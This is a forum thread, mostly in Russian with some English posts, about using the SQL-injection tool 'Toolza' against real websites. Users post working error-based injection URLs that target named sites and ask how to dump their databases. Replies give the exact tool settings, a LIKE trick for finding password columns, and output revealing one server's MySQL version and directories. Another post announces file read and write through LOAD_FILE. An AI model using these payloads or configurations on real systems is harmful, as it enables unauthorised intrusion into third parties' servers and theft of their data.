ты про консоль? тогда в помощь: ctrl+s = остановить/продолжить выполнение ctrl+c = прекратить выполнение
А можно как-то с помощью toolsы вылавливать ответ с хидера? так как бывают ситуации, что результат возвращается не в теле страницы а в параметре хидера
да, а еще есть [pause/break] и ctrl-[pause/break] т.е. за информацию спасибо, но она никакого, по крайней мере прямого, отношения к этому: не имеет. или ты думал что у меня лог не сохраняет по причине того, что я окно крестиком закрываю ? то не, я не такой, у меня и справка есть [c] князь мышкинъ, программист по образованию ок. ну все, терь уважаю тя и как чела, и как программера, и как чела, шарящего в уязвимостях [прямо полный набор получился респект Тебе, Человечище ]
Hi How can i get its Database and Tables and Columns and its Data through Toolza vulnerable url http://www.downloadhq.org/search.php?q=Fantasy',(select%20count(*)%20from%20 (select%201%20union%20select%202%20union%20select% 203)x%20group%20by%20concat(version(),floor(rand(0 )*2))))%23 Thank you
Pashkela чтоб опять не возникло моя твоя не понимай, решил уточнить то, что я имел в виду по поводу использования like при блинд: вводим условие имя на колонки, например pass [%pass%=0x257061737325] и при выборке/подборке колонок и таблиц используем следующее условие: select table_name, column_name from information_schema.columns where column_name like 0x257061737325 and TABLE_SCHEMA=database(); => таким образом количество запросов при поиске нужных данных можно уменьшить в 10-ки или даже 100-ни раз. на выходе должны получить примерно следующее: table1.column11 table1.column12 table2.column21 ... tableN.columnN1
1.Right SQl injection url (for Toolza): Code: http://www.downloadhq.org/search.php?q=Fantasy',(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+search+group+by+2+limit+1)a),' 2. Settings in toolza.pl: Code: $method = 1; $f_table = "search"; $f_url = "http://www.downloadhq.org/search.php?q=Fantasy',(select+1+from+"; $f_plus = "+"; $f_filtr = "a),'"; results: Code: 12 Your choice: 12 ------------------------------------------------------------------- Choose mode: ------------------------------------------------------------------- [1] floor(rand()) - system information [2] floor(rand()) - get DB-names from information_schema.schemata [3] floor(rand()) - get tables from DB-name [4] floor(rand()) - get column_name from tables from DB-name [5] floor(rand()) - get tables from information_schema (current DB) [6] floor(rand()) - get column_name from table (current DB) [7] floor(rand()) - get data from columns [8] floor(rand()) - Mysql4 inj brute tables and columns ------------------------------------------------------------------- [9] Main menu ------------------------------------------------------------------- 1 Your choice: 1 ----------------------------------------- System information: ----------------------------------------- Request method - POST ---------------------- ver:5.0.77 base:DHQ basedir:/usr/ datadir:/mnt/sdb/mysql/ tmpdir:/tmp/ os:redhat-linux-gnu 2 DrakonHaSh: ok-ok
Как работать постом? Например, есть в форме одно поле - id. Code: $method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET ... http://host/form.php?id=1+union+select+^ Так не выходит И еще: скрипт посылает заголовок Referer как Http-Referer, это впрочем легко изменить в исходниках.
update:======>download Mysql inj LOAD_FILE (file_priv = Y) - читаем файлики, когда есть возможность - содержимое директорий. Автохекс. Запись в файл. Показывается только нужное содержимое.
how can i use this link in toolza ? http://www.team-dignitas.org/index.php?id=10104%27+and+%28select+1+from+%28select+count%280%29,concat%28%28select+version%28%29%29,floor%28rand%280%29*2%29%29+from+news+group+by+2+limit+1%29a%29--+
Как я могу использовать эту ссылку в toolza для получения данных и таблиц и столбцов? http://www.team-dignitas.org/index.php?id=10104%27+and+%28select+1+from+%28sele ct+count%280%29,concat%28%28select+version%28%29%2 9,floor%28rand%280%29*2%29%29+from+news+group+by+2 +limit+1%29a%29--+
$method = 1; #Post or Get method, 1-POST; 0-GET $f_table = "news"; $f_url = "http://www.team-dignitas.org/index.php?id=10104'+and+(select+1+from+"; # url $f_plus = "+"; $f_filtr = "a)--+"; # close SQL last time here, after - https://rdot.org/forum
Столкнулся вепрвые с name_const навели меня на эту утилитку + заодно увидел и другую утилиту sql... как-то там По мне лично,как новичку, удобнее пользоваться Toolza как говориться есть какой никакой интерактив, т.е. выбрал,выбрал...и пошел... Скорость....что касается скорости я особо не запариваюсь, для меня важен результат, результат был получен, спасибо Pashkela. ИМХО утилита - проста, разнообразна по функционалу, удобна "как для новичка". Спорить об алгоритмах, быстродействиях не могу ввиду своих малых познаниях в SQL
